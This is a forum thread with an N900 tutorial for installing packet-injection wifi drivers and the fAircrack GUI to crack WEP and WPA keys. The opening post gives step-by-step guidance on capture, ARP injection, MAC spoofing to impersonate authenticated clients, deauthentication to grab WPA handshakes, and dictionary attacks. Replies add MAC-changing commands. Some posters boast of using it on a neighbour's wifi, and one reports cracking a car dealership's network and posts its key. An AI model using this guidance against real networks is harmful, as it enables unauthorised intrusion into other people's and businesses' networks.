[Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

Hello!
Tutorial Time!

I see a lot of people looking for help in the announcement thread.
I think that thread should be left for ideas, testing and development. Not help.
I am going to list up all required help here.
Post required help here..

BUT! Only if you have read and do everything written here!

Don't skip a single step and you won't need help! I SWEAR! :D

Pre Stage:
xTerm and Type:

Code:

---

sudo apt-get moo

---

Without this: You can not gain Super Cow Powers!

First thing is first!
Open Package Manager and install "rootsh".
Install: Power kernel

Then:
Xterm:
Main Parts!

Step 1:
Donate lxp for the wifi drivers to get the files.
You will receive the drivers. Or find these elsewhere.

Step 2:
When you received these (140MB'ish) drivers and downloaded them to (or copy) your MyDocs [N900], File = wl1251-maemo-0.1.tar.gz.

Step 3:
This is also in the Readme file

Installation:
Open X Terminal

type the following commands to untar the file:
Step 4:
Driver Time:
Code:
Time to install!

Step 5:
This step is only needed if you have multiboot on your N900

Write this:
Ctrl (on touch screen) + W to exit and save

Select the kernel from the boot list:
Maemo 2.6.28.10power46-wl1

Now time for fAIRCRACK!

faircrack.tar.gz
hildon.tar.gz

Part 1:
Download faircrack.tar.gz AND hildon.tar.gz to MyDocs on your N900.

Part 2:
Part 3:
Part 4:
Part 5:
Part 6:
Make sure all the files have been extracted to the MyDocs/FAS/ directory and that the following folders exist:
By Typing and look for these folders

MyDocs/FAS/keys/
MyDocs/FAS/diction/
MyDocs/FAS/cap/
MyDocs/FAS/cap/WEP/
MyDocs/FAS/cap/WPA/

Part 7: (icon!)
Part 8:
part 9:
Part 10:
Part 11:
Usage (Direct Copy from Announcement thread):

---------------------- Usage ----------------------------------------

To run fAircrack, you can use the shortcut (recommended), or issue the following command:

sh /home/user/MyDocs/FAS/launch.sh

Bear in mind that if you are running it from xterm you will probably see a few warning messages like "*.cap does not exist" and "basename usage". This is a result of my messy coding and does not cause any problems. This will be fixed in v0.2.

WEP

Firstly a little background information from the aircrack wiki

"A little theory first. WEP is a really crappy and old encryption techinque to secure a wireless connection. A 3-byte vector, called an Initalization Vector or IV, is prepended onto packets and its based on a pre-shared key that all the authenticated clients know... think of it as the network key you need to authenticate.

Well if its on (almost) every packet generated by the client or AP, then if we collect enough of them, like a few hundred thousand, we should be able to dramatically reduce the keyspace to check and brute force becomes a realistic proposition."

First things first, from the 'Monitor' tab enable the packet injection drivers and then monitor mode. At the moment there is no way to check if the drivers are enabled or not so if you aren't sure then just click the enable button anyway.

Next, you will need to click on the 'Access Point' tab. From here select how many seconds to run a scan for (default is 5) and click the scan button. Make sure the WEP button is highlighted to show only WEP networks. Select your desired target and click the "Start Packet Capture" button. This will load airodump in an xterm. Be sure to leave this window open until you are ready to crack.

Now you must click the "Authenticate" button to attempt to authenticate with the network, which will allow you to perform packet injection. This will launch a new xterm which will display information about your authentication request. If you see a line similar to "AID 1 :-)" then all is good. If not, try changing your mac address to the same as an already authenticated client (you can see them at the bottom of the airodump xterm). Bear in mind that changing your mac requires the stopping and starting of your interface and it WILL close your airodump window

Once authenticated, click the "Injection" button, this will launch a new xterm and start listening for ARP and ACK packets. As soon as a ARP packet is captured it SHOULD start re-injecting it at about 500pps (packets per second). At this point the number of ARP requests should start to skyrocket! If injection starts but the ARP number remains static, it means you need to authenticate with the router. Leave the authentication and injection windows open.

To check how many IVs you have successfully captured, click on the "Decryption" tab, and select your current CAP file from the list. This will be the name of the network and a number. Now click the "Decrypt" button. It will load aircrack in a new xterm and after reading the packets it will display how many IVs have been captured and attempt to crack the key. You will normally need at least 50,000 IVs in order to perform a successful decryption, so if it is much less than this then you may as well close this window.

Once you are ready to crack, press the decrypt button and if you have enough IVs, the password should be broken in seconds. At this point the aircrack xterm will close and you can view the key by selecting it from the list and clicking the "Show Key" button. If it doesn't show up, just press the "Refresh" button. (Keys are also stored in your MyDocs/FAS/keys/ directory).

If all went well then the whole process should take around 8-15 minutes.


WPA

WPA is different. Read the FAQs for more information.

First scan for networks as before and select WPA to display the WPA access points. Now click on which one you want to crack and press the "Start Packet Capture" button.

Now you will have to wait for a client to connect to the access point, at which point you will see a message in the top right of your airodump window saying "WPA Handshake" followed by the mac address of the router.

Now click on the "Decryption" tab. From here select the current cap from the list (being sure to select WPA and not WEP), now select either a dictionary or specify an attack method for John. When you are ready, highlight either "wordlist" or "john" and press decrypt.

------------------------------ FAQs -----------------------------------

Q. It keeps asking me for a password. Wtf?
A. Install Sudser

Q. What's an access point?
A. Wireless router.

Q. What will I use this for?
A. If you don't know the answer to that then you don't need it.

Q. Why do I keep receiving deauth packets when authenticating?
A. I assume this is due to router security. Try changing your mac (from the main menu) to match a client that is already connected. You can find this from the already opened airodump window.

Q. Why am I not receiving any ARP packets when trying to perform injection?
A. Depending on the access point, it may be very difficult to capture/relay ARP requests, particularly if:
> You are not close enough to the access point.
> There is no traffic on the access point.
I find the number starts rising rapidly as soon as a client connects.

Q. I have tried everything, but just cannot inject/authenticate/anything. What gives?
A. Unfortunately, each make/model of router is different and no matter how hard you try you may not be able to get into it. fAircrack includes the settings that in my experience have been the most successful, but you may have better luck using aircrack directly and experimenting. (in future releases there will be far more options)

Q. Why is WPA so much harder to crack?
A. WEP encryption is weak. Each IV (initialization vector) contains a small portion of the key, so when enough of these are captured the key can be deciphered. WPA however is far more secure and cannot be "cracked". However, when an authenticated client connects to a WPA access point a "handshake" is generated. This handshake can be captured by airodump and aircrack can subsequently run a bruteforce dictionary attack against it, possibly finding the key (however if the exact key is not in the dictionary, it will obviously not work). To capture the handshake you can either wait for a client to connect, or you can launch a deauthentication attack (using my script) to force a client to disconnect and reconnect to the AP, allowing you to capture the handshake.

However, a word list big enough to 100% GUARANTEE to crack an 8-digit alphanumeric case-sensitive wpa key would have up to 62771017353866807638357894232076664161023554444640 34512896 different combinations. And this is WITHOUT symbols.

On the same basis, a 64-digit wpa key would have up to 39402006196394479212279040100143613805079739270465 44666794829340424572177149721061141426625488491564 0806627990306816 different combinations.

These wordlists would be thousands of terabytes in their totality.

In short, it's possible but not feasible. Bearing in mind that a device like the N900 could probably only check around 20-30 keys per second. The best you could do is capture the handshake with the N900 then use a desktop to attempt to crack the password.

Realistically, the only way you are going to bruteforce a wpa key is if the person who the network belongs to (obviously you ) has set something really mundane or stupid as their key. Any default key containing letters and numbers would be near enough impossible and take possibly years to break.

Enjoy. Press Thanks! :D


Credit goes to:FRuMMaGe for GUI

More will be added as needed.

Edit:
Moo - http://scruss.com/wordpress/wp-conte...007/01/moo.png

Re: [TUTORIALS] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

Yeah I needed a good complete tutorial to play with my neighbor's Wifi! Thanks Kingoddball for this!! You're the man!

Am I obliged to Install Power Kernel?? I noticed that the phone won't reboot if i install it!!!

Re: [TUTORIALS] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

Yeah.
Power Kernel has all needed modules.
Install via package manager or terminal;
sudo apt-get install kernel-power

Re: [TUTORIALS] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

errr,..... sorry for the noob question , but what is "moo" and what are super cow powers??

Re: [TUTORIALS] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

hahaha so funny :PPPPPPP :D

Re: [TUTORIALS] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

Thanks for this Kingoddball, I have been using Frummages gui and tutorial for a while now, I see in your tutorial you mention "cow" this is the first time I have seen cow mentioned what does cow power do? and do i really need it?
thanks
Mart 5.1

Re: [TUTORIALS] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

Moo!

It's a linux/apt easter egg. Just do it! :) Enjoy it!

Edit:


...."Have you mooed today?"...

Re: [TUTORIALS] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

[QUOTE=kingoddball;937834]Moo!

It's a linux/apt easter egg. Just do it! :) Enjoy it!

Edit:


...."Have you mooed today

Ha ha thanks Oddball, but what about "Nano" what's that for?

Re: [TUTORIALS] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

Text editor.
If you're new to it and don't want to learn, just install leafpad.
Nano is my favourite console based text editor. Simple. Fun. Look geeky as hell!

Nano is: http://www.my-maemo.com/grafika/nano.jpg

Re: [TUTORIALS] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

Ah i see now, thanks again. I will stick with leafpad for the time being, Bye the way any news on Frummage and friends integrating wesside-ng into the gui?.
Thanks
mart5.1

Re: [TUTORIALS] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

@Mart5.1: No Clue. I will ask if he is.
I had never heard of that! :D

But after a simple bit of google-fu I found these!

aircrack-ng
airdecap-ng
airdriver-ng
aireplay-ng
airmon-ng
airodump-ng
airolib-ng
airsev-ng
airtun-ng
buddy-ng
easside-ng
ivstools
kstats
makeivs-ng
packetforge-ng

Re: [TUTORIALS] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

thanks for the swift reply i will keep following the other thread for updates
cheers
mart5.1

Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

too lame...

Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

What's lame?

If you don't like it, don't loiter around here :rolleyes:

Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

Just like your post.....?

Really?

Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

...or you could compile coWPAtty and run precomputed rainbow tables against the target networks specific ID.

Oh look!

insane 49 million password precomputed rainbow tables

The n900 could easily managed 20-30,000 passwords a second...

Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

WPA is very hard. Mine is not the default router password. It's not a word. It's a combination. 12 digits. It could takes weeks/months or even years for a brute force attack.. :(
I wanna try hit a WPA network - Mine even! :D

Up to 30,000 per minute?! What!? :eek:
Are you sure?
I thought it was a LOW number.

I'm sure I could spare 1.9GB! The N900 is a powerhouse of storage! I have 40GB atm. It was 48GB.

Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

I need help changing my MAC, can somebody guide me?

Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

I lol'd at people asking what apt-get moo and does and why do they need it :')

Thanks for the guide. My phone needed a reflash at 3Am this morning, now I don't even need to think about what I'm doing.

Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

First ty for the guide, but I have a problem followed your guide and all went well except for when I try to use the short cut nothing happens closes back to desktop and when I use the x-term I get this..any suggestion..ty

Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

Ehhem?....

Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

ifconfig wlan0 hw ether <yournewmacaddress>

Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

install PyQt4 Full from the repos.


install macchanger then from the commandline do

macchanger --mac=FA:KE:HE:RE:L0:0L interface1

Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

[QUOTE=Captwheeto;938037]install PyQt4 Full from the repos.


Thanks a ton for this!

Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

why does aircrack keeps on sending association requests with no resonse?

Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

Potentially because you need to change your MAC to the same as a pre-authenticated client on the network.

You can also change your MAC from within the GUI for fAircrack. Monitor tab.

Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

Isn't the pre-authenticated client's mac address shown on airodump?
I know that this might sound stupid but can somebody point me to what mac address should I change to?

Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

Install PyQt

Or change it from within fAircrack

Both of the MAC adresses below the "STATION" heading are authenticated macs.

Bear in mind that if you attempt to authenticate then your own mac will appear aswell even if unsuccessful

Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

@Ammyt: What type of network are you "hitting"?
Is it a big company? WEP?

I found one (in my house of course ;) ) and I can get authenticated but can not get a single piece of Data.
I think it's just bare router, no actual internet connection.

Maybe the router is using mac filtering.
Write down a few of the macs on airodump window (as you have posted) and try that.

Or just try press the random button (update to the new faircrack).

Also - To change it in Faircrack - Click on the Monitor tab and on the right side. Eneter the MAC you want or click random, save.

Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

why i can only detect other router but not my own router????
my router also using WEP but funny thing is even if i can detect my own router i cannot start packet capture but i can if i try on other router....

Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

Well I could say that a Toyota retailer & parts shop is big, isn't it? BTW I already cracked it (wep). Looks kinda stupid that an official company branch uses an old way of encryption, and just look at the code: 1112131415, isn't this stupid?!

Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

Apparently larger networks (i.e: Big warehouses) are "recommended" to use WEP? Why? NO CLUE! ;)
But that's what I have seen.
One I have seen (although I knew the password already) it's 26 digits - all numbers. WEP. MASSIVE network.
But somehow - the one WEP key will give you access to ALL company sites Australia wide (which is probably why they use WEP).

Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

Just a tip that I mentioned in the Faircrack topic.
You need the power kernel from the list at page 1 in order to be able to load the injection drivers properly.
You must have kernel-power_2.6.28-maemo46-wl1
I had the kernel from extras repositories and I had errors like wlan0 device not found or insmod: invalid parameters.
You should also install the packages at page 1 manually in terminal and not by opening them with HAM.

Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

Thanks for the tutorial, is there any info on disconnecting clients?

Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

great, thank you, well managed to decipher my wep key ... So I want to attack me ... I have a wpa network on my tent with a simple wpa 8 digits that follow ...
voila, so I enable the packet injection, monitor mode enable, then in the tab access point I scan the wpa key and I find my network well. I smith "star packet injection, xterminal opens ok .. I disconnect and reconnect and get me out the" WPA handshake "
I go to decrypt the tab. I select my wpa network heading, and therefore, as I understand, I have 2 methods to try to break the famous clef.avec worldlist or john.
so what format for dictionaries? I understand or put them in far, dico. but what is the format? and where to find for France? we can create one just to try our password in? to see if it works?
then the 2nd method is with john, he must also select a dictionary to this method? how does it work there?
at what point one sees that the key was found? is that the terminal closes like a WEP key? if it's good?
thank you for your answers and excuse my English so ugly haha

Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

i cant able to do following commamds (step 4 driver time):
/home/user/MyDocs/wl1251-maemo/binary/kernel-power: dpkg -i kernel-power_2.6.28-maemo46-wl1_armel.deb
it says incompatible version. i dont know what to do. i can enter into wl12..-maemo folder but i cant able to enter in binary folder. it says something sh to cd: you cant do cd to binary
pls help me guys

Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

should show if the modules are enabled or not..

modules when enabled will show the output of "lsmod |grep wl12" like this:

Attachment 17714

modules when disabled will show this:

Attachment 17715

Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

Thanks for this! By the way, you need to change the install instructions for John The Ripper to :
john should be lowercase as opposed to John, as in your instruction. :)

Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

when i type this command

/home/user/MyDocs/wl1251-maemo/binary/kernel-power # cd /boot
/boot # mv zImage-2.6.28-maemo46-wl1 multiboot/vmlinuz-2.6.28.10power46-wl1

mv:can not rename zimage-2.6.28-maemo46-wl1 no such file or directory

any solution plz

Re: [Tutorials] fAircrack, JackTheRipper, wl1 Bleeding Edge and Super Cow Power!
 

dude...do u really have to post the same thing at 5 different threads???can't u just wait for the reply?if 2 or 3 threads that's okay...but 5 diff threads???lol..

btw, i'd suggest u use SSH..it'll be much easier for u..copying,pasting,moving,renaming can be done easily on SSH rather than command line..the chances to brick ur phone when using CLI is higher than using SSH..